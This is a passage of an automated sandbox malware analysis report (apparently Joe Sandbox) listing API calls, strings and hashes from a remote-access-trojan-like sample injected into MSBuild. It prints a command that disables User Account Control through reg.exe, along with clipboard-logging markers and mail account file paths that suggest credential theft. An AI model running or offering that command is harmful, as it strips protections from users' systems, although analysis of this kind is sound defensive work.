                                                                                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                                                                                    • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                    • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                      • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                      • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                      • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                      • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                                                                    • API String ID: 2974294136-753205382
                                                                                                                                                                                    • Opcode ID: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                                                                                    • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                                                                    • Opcode Fuzzy Hash: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                                                                                    • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                    • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                                                    • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                    • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                    • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                    • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                    • String ID: pth_unenc$BG
                                                                                                                                                                                    • API String ID: 1818849710-2233081382
                                                                                                                                                                                    • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                                                                    • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                                                    • SetEvent.KERNEL32(000002E8), ref: 00404AF9
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                                                    • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                                                                    • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                                                    • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                    • String ID: Alarm triggered
                                                                                                                                                                                    • API String ID: 614609389-2816303416
                                                                                                                                                                                    • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                                                                    • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                    • API String ID: 3024135584-2418719853
                                                                                                                                                                                    • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                    • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                                                                    • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                      • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                      • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                                                                      • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                                                                                                                      • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                      • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2180151492-0
                                                                                                                                                                                    • Opcode ID: 7238978299997b7061844dbc32c377fc2e23d749be97957dc898af5dbad08845
                                                                                                                                                                                    • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7238978299997b7061844dbc32c377fc2e23d749be97957dc898af5dbad08845
                                                                                                                                                                                    • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                    • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                                                                                                    • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                                    • Opcode ID: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                                                                                                                                                                                    • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                                                    • Opcode Fuzzy Hash: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                    • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 336800556-0
